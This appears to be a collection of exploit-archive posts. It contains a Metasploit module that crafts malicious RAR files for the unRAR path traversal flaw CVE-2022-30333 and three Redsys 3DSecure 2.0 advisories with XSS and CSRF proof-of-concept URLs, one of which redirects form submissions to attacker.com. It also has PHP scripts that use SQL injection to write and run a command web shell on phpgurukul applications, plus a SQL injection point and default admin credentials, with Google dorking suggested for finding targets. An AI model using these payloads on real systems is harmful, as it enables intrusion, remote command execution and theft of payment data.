<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::Format::RarSymlinkPathTraversal<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'UnRAR Path Traversal (CVE-2022-30333)',<br /> 'Description' => %q{<br /> This module creates a RAR file that exploits CVE-2022-30333, which is a<br /> path-traversal vulnerability in unRAR that can extract an arbitrary file<br /> to an arbitrary location on a Linux system. UnRAR fixed this<br /> vulnerability in version 6.12 (open source version 6.1.7).<br /><br /> The core issue is that when a symbolic link is unRAR'ed, Windows<br /> symbolic links are not properly validated on Linux systems and can<br /> therefore write a symbolic link that points anywhere on the filesystem.<br /> If a second file in the archive has the same name, it will be written<br /> to the symbolic link path.<br /> },<br /> 'Author' => [<br /> 'Simon Scannell', # Discovery / initial disclosure (via Sonar)<br /> 'Ron Bowes', # Analysis, PoC, and module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2022-30333'],<br /> ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],<br /> ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],<br /> ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],<br /> ],<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [ 'Generic RAR file', {} ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2022-06-28',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [],<br /> 'SideEffects' => []<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),<br /> OptString.new('CUSTOM_PAYLOAD', [ false, 'A custom payload to encode' ]),<br /> OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../" - as well as a filename).']),<br /> OptString.new('SYMLINK_FILENAME', [ true, 'The name of the symlink file to use (must be 12 characters or less; default: random)', Rex::Text.rand_text_alpha_lower(4..12)])<br /> ]<br /> )<br /> end<br /><br /> def exploit<br /> print_status("Target filename: #{datastore['TARGET_PATH']}")<br /><br /> if datastore['CUSTOM_PAYLOAD'].present?<br /> print_status("Encoding custom payload file: #{datastore['CUSTOM_PAYLOAD']}")<br /> payload_data = File.binread(datastore['CUSTOM_PAYLOAD'])<br /><br /> # Append a newline + NUL byte, since random data will be appended and we<br /> # don't want to break shellscripts<br /> payload_data.concat("\n\0")<br /> else<br /> print_status('Encoding configured payload')<br /> payload_data = generate_payload_exe<br /> end<br /><br /> begin<br /> rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'], datastore['TARGET_PATH'], payload_data)<br /> rescue StandardError => e<br /> fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}")<br /> end<br /><br /> file_create(rar)<br /> end<br />end<br /></code></pre>
<pre><code>Product: 3DSecure 2.0<br />Manufacturer: Redsys<br />Affected Version(s): 3DSecure 2.0 3DS Authorization Method<br />Tested Version(s): 3DSecure 2.0 3DS Authorization Method<br />Vulnerability Type: Cross-Site Request Forgery (CSRF)<br />Risk Level: Medium<br />Solution Status: Not yet fixed<br />Manufacturer Notification: 2024-01-17<br />Solution Date: N/A<br />Public Disclosure: 2024-09-17<br />CVE Reference: CVE-2024-25286<br /><br />Overview:<br />A Cross-Site Request Forgery (CSRF) vulnerability was identified in the Authorization Method of 3DSecure 2.0, allowing attackers to submit unauthorized form data by modifying the HTTP Origin and Referer headers.<br /><br />Vulnerability Details:<br />By altering the Origin and Referer headers, attackers can trick the server into processing unauthorized transactions.<br /><br />Solution:<br />No solution is currently available. Redsys has been notified.<br /><br />References:<br />OWASP Web Security Testing Guide: CSRF<br /><br />Discoverer:<br />Reported by Rubén López Herrera<br /><br />________________________________<br /><br />Este mensaje y sus adjuntos se dirigen exclusivamente a su destinatario, puede contener información privilegiada o confidencial y es para uso exclusivo de la persona o entidad de destino. Si no es usted. el destinatario indicado, queda notificado de que la lectura, utilización, divulgación y/o copia sin autorización puede estar prohibida en virtud de la legislación vigente. Si ha recibido este mensaje por error, le rogamos que nos lo comunique inmediatamente por esta misma vía y proceda a su destrucción.<br /><br />The information contained in this transmission is confidential and privileged information intended only for the use of the individual or entity named above. If the reader of this message is not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this transmission in error, do not read it. Please immediately reply to the sender that you have received this communication in error and then delete it.<br /><br />Esta mensagem e seus anexos se dirigem exclusivamente ao seu destinatário, pode conter informação privilegiada ou confidencial e é para uso exclusivo da pessoa ou entidade de destino. Se não é vossa senhoria o destinatário indicado, fica notificado de que a leitura, utilização, divulgação e/ou cópia sem autorização pode estar proibida em virtude da legislação vigente. Se recebeu esta mensagem por erro, rogamos-lhe que nos o comunique imediatamente por esta mesma via e proceda a sua destruição<br /><br /></code></pre>
<pre><code>Product: 3DSecure 2.0<br />Manufacturer: Redsys<br />Affected Version(s): 3DSecure 2.0 3DS Method Authentication<br />Tested Version(s): 3DSecure 2.0 3DS Method Authentication<br />Vulnerability Type: Cross-Site Scripting (XSS)<br />Risk Level: Medium<br />Solution Status: Not yet fixed<br />Manufacturer Notification: 2024-01-17<br />Solution Date: N/A<br />Public Disclosure: 2024-09-17<br />CVE Reference: CVE-2024-25285<br /><br />Overview:<br />3DSecure 2.0 is vulnerable to form action hijacking via the threeDSMethodNotificationURL parameter. This flaw allows attackers to change the destination website for form submissions, enabling data theft.<br /><br />Vulnerability Details:<br />The threeDSMethodNotificationURL parameter is vulnerable to modification, allowing attackers to redirect form submissions to malicious destinations.<br /><br />Proof of Concept (PoC):<br />By modifying the threeDSMethodNotificationURL parameter in a POST request, an attacker can change the form's action URL. Example:<br /><br />https://sis-d.redsys.es/sis-simulador-web/threeDsMethod.jsp?threeDSMethodData=eyJ0aHJlZURTTWV0aG9kTm90aWZpY2F0aW9uVVJMIjoiaHR0cHM6Ly9hdHRhY2tlci5jb20iLCJ0aHJlZURTU2VydmVyVHJhbnNJRCI6IjM5NDA4Mzk2LTdjY2MtNGU4YS04NjU2LThmMTZlNmNlMDQ5OCJ9%3d%3dld4ga%22%3e%3cscript%3ealert(1)%3c%2fscript%3epsoojei88ze<br /><br />Solution:<br />No solution is currently available. Redsys has been notified.<br /><br />References:<br />OWASP Web Security Testing Guide: Form Action Hijacking<br /><br />Discoverer:<br />Reported by Rubén López Herrera<br /><br />________________________________<br /><br />Este mensaje y sus adjuntos se dirigen exclusivamente a su destinatario, puede contener información privilegiada o confidencial y es para uso exclusivo de la persona o entidad de destino. Si no es usted. el destinatario indicado, queda notificado de que la lectura, utilización, divulgación y/o copia sin autorización puede estar prohibida en virtud de la legislación vigente. Si ha recibido este mensaje por error, le rogamos que nos lo comunique inmediatamente por esta misma vía y proceda a su destrucción.<br /><br />The information contained in this transmission is confidential and privileged information intended only for the use of the individual or entity named above. If the reader of this message is not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this transmission in error, do not read it. Please immediately reply to the sender that you have received this communication in error and then delete it.<br /><br />Esta mensagem e seus anexos se dirigem exclusivamente ao seu destinatário, pode conter informação privilegiada ou confidencial e é para uso exclusivo da pessoa ou entidade de destino. Se não é vossa senhoria o destinatário indicado, fica notificado de que a leitura, utilização, divulgação e/ou cópia sem autorização pode estar proibida em virtude da legislação vigente. Se recebeu esta mensagem por erro, rogamos-lhe que nos o comunique imediatamente por esta mesma via e proceda a sua destruição<br /><br /></code></pre>
<pre><code>Product: 3DSecure 2.0<br />Manufacturer: Redsys<br />Affected Version(s): 3DSecure 2.0 3DS Authorization Method<br />Tested Version(s): 3DSecure 2.0 3DS Authorization Method<br />Vulnerability Type: Cross-Site Scripting (XSS)<br />Risk Level: Medium<br />Solution Status: Not yet fixed<br />Manufacturer Notification: 2024-01-17<br />Solution Date: N/A<br />Public Disclosure: 2024-09-17<br />CVE Reference: CVE-2024-25284<br /><br />Overview:<br />Multiple reflected Cross-Site Scripting (XSS) vulnerabilities in the 3DS Authorization Method of 3DSecure 2.0 allow attackers to inject arbitrary web scripts via the threeDSMethodData parameter.<br /><br />Vulnerability Details:<br />The threeDSMethodData parameter is not sanitized before being processed, allowing attackers to inject scripts by concatenating code or modifying the base64-encoded information.<br /><br />Proof of Concept (PoC):<br />An attacker can manipulate the threeDSMethodData parameter in the request URL to inject malicious code. Example:<br /><br />https://sis-d.redsys.es/sis-simulador-web/threeDsMethod.jsp?threeDSMethodData=eyJ0aHJlZURTTWV0aG9kTm90aWZpY2F0aW9uVVJMIjoiaHR0cHM6Ly9hdHRhY2tlci5jb20iLCJ0aHJlZURTU2VydmVyVHJhbnNJRCI6IjM5NDA4Mzk2LTdjY2MtNGU4YS04NjU2LThmMTZlNmNlMDQ5OCJ9%3d%3dld4ga%22%3e%3cscript%3ealert(1)%3c%2fscript%3epsoojei88ze<br /><br />Solution:<br />No solution is currently available. Redsys has been notified of the issue.<br /><br />References:<br />OWASP Web Security Testing Guide: Reflected Cross-Site Scripting<br /><br />Discoverer:<br />Reported by Rubén López Herrera<br /><br />________________________________<br /><br />Este mensaje y sus adjuntos se dirigen exclusivamente a su destinatario, puede contener información privilegiada o confidencial y es para uso exclusivo de la persona o entidad de destino. Si no es usted. el destinatario indicado, queda notificado de que la lectura, utilización, divulgación y/o copia sin autorización puede estar prohibida en virtud de la legislación vigente. Si ha recibido este mensaje por error, le rogamos que nos lo comunique inmediatamente por esta misma vía y proceda a su destrucción.<br /><br />The information contained in this transmission is confidential and privileged information intended only for the use of the individual or entity named above. If the reader of this message is not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this transmission in error, do not read it. Please immediately reply to the sender that you have received this communication in error and then delete it.<br /><br />Esta mensagem e seus anexos se dirigem exclusivamente ao seu destinatário, pode conter informação privilegiada ou confidencial e é para uso exclusivo da pessoa ou entidade de destino. Se não é vossa senhoria o destinatário indicado, fica notificado de que a leitura, utilização, divulgação e/ou cópia sem autorização pode estar proibida em virtude da legislação vigente. Se recebeu esta mensagem por erro, rogamos-lhe que nos o comunique imediatamente por esta mesma via e proceda a sua destruição<br /><br /></code></pre>
<pre><code>Product: 3DSecure 2.0<br />Manufacturer: Redsys<br />Affected Version(s): 3DSecure 2.0 3DS Authorization Challenge<br />Tested Version(s): 3DSecure 2.0 3DS Authorization Challenge<br />Vulnerability Type: Cross-Site Scripting (XSS)<br />Risk Level: Medium<br />Solution Status: Not yet fixed<br />Manufacturer Notification: 2024-01-17<br />Solution Date: N/A<br />Public Disclosure: 2024-09-17<br />CVE Reference: CVE-2024-25283<br /><br />Overview:<br />Multiple reflected Cross-Site Scripting (XSS) vulnerabilities exist in the 3DS Authorization Challenge of 3DSecure 2.0. These flaws allow attackers to inject arbitrary web scripts, CSS, or HTML through the manipulation of the params parameter in the request URL.<br /><br />Vulnerability Details:<br />The params parameter in the 3DS Authorization Challenge is vulnerable to code injection. This flaw occurs because the value entered into the parameter is not sanitized, allowing attackers to create new HTML elements in the DOM and execute malicious code in the victim's browser.<br /><br />Proof of Concept (PoC):<br />An attacker can alter the base64-encoded params parameter in the request URL to inject arbitrary code. Example:<br /><br />https://[REDACTED]/[REDACTED]/rest/online/[REDACTED]/redirect?action=challenge&txn=[REDACTED]&params=[REDACTED]"<br /><br />References:<br />OWASP Web Security Testing Guide: Reflected Cross-Site Scripting<br /><br />Discoverer:<br />Reported by Rubén López Herrera<br /><br />________________________________<br /><br />Este mensaje y sus adjuntos se dirigen exclusivamente a su destinatario, puede contener información privilegiada o confidencial y es para uso exclusivo de la persona o entidad de destino. Si no es usted. el destinatario indicado, queda notificado de que la lectura, utilización, divulgación y/o copia sin autorización puede estar prohibida en virtud de la legislación vigente. Si ha recibido este mensaje por error, le rogamos que nos lo comunique inmediatamente por esta misma vía y proceda a su destrucción.<br /><br />The information contained in this transmission is confidential and privileged information intended only for the use of the individual or entity named above. If the reader of this message is not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this transmission in error, do not read it. Please immediately reply to the sender that you have received this communication in error and then delete it.<br /><br />Esta mensagem e seus anexos se dirigem exclusivamente ao seu destinatário, pode conter informação privilegiada ou confidencial e é para uso exclusivo da pessoa ou entidade de destino. Se não é vossa senhoria o destinatário indicado, fica notificado de que a leitura, utilização, divulgação e/ou cópia sem autorização pode estar proibida em virtude da legislação vigente. Se recebeu esta mensagem por erro, rogamos-lhe que nos o comunique imediatamente por esta mesma via e proceda a sua destruição<br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Nipah virus (NiV) – Testing Management System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload inject php code contains a back door.<br /><br />[+] Line 16 + 19 Set your Target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><br /><?php<br />// المكتبات المطلوبة<br />function send_request($url, $data) {<br /> $options = [<br /> 'http' => [<br /> 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br /> 'method' => 'POST',<br /> 'content' => http_build_query($data),<br /> ]<br /> ];<br /> $context = stream_context_create($options);<br /> return file_get_contents($url, false, $context);<br />}<br /><br />// تحديد URL ثابت<br />$url = 'http://localhost/nipah-tms/';<br /><br />// مسار ثابت لرفع الملف<br />$path = 'C:\www\nipah-tms\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path);<br /><br />// حمولة الباب الخلفي<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// إرسال ملف PHP يحتوي على الباب الخلفي<br />$payload = [<br /> 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br /> 'password' => 'test',<br /> 'login' => ''<br />];<br />send_request($url . "/login.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n";<br /><br />// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي<br />$response = file_get_contents($url . "uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Medical Card Generations System 1.0 Sql injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/medical-card-generation-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : view-card-detail.php?viewid=1 <==== inject here <br /><br />[+] http://127.0.0.1/mcgs/view-card-detail.php?viewid=1<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Maid Hiring Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/maid-hiring-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/mhms/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Emergency Ambulance Hiring Portal 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload inject php code contains a back door.<br /><br />[+] Line 16 + 19 Set your Target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><br /><?php<br />// المكتبات المطلوبة<br />function send_request($url, $data) {<br /> $options = [<br /> 'http' => [<br /> 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br /> 'method' => 'POST',<br /> 'content' => http_build_query($data),<br /> ]<br /> ];<br /> $context = stream_context_create($options);<br /> return file_get_contents($url, false, $context);<br />}<br /><br />// تحديد URL ثابت<br />$url = 'http://localhost/eahp/';<br /><br />// مسار ثابت لرفع الملف<br />$path = 'C:\www\eahp\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path);<br /><br />// حمولة الباب الخلفي<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// إرسال ملف PHP يحتوي على الباب الخلفي<br />$payload = [<br /> 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br /> 'password' => 'test',<br /> 'login' => ''<br />];<br />send_request($url . "/admin/login.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n";<br /><br />// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي<br />$response = file_get_contents($url . "uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Doctor Appointment Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/doctor-appointment-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: anu@gmail.com<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/dams/doctor/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>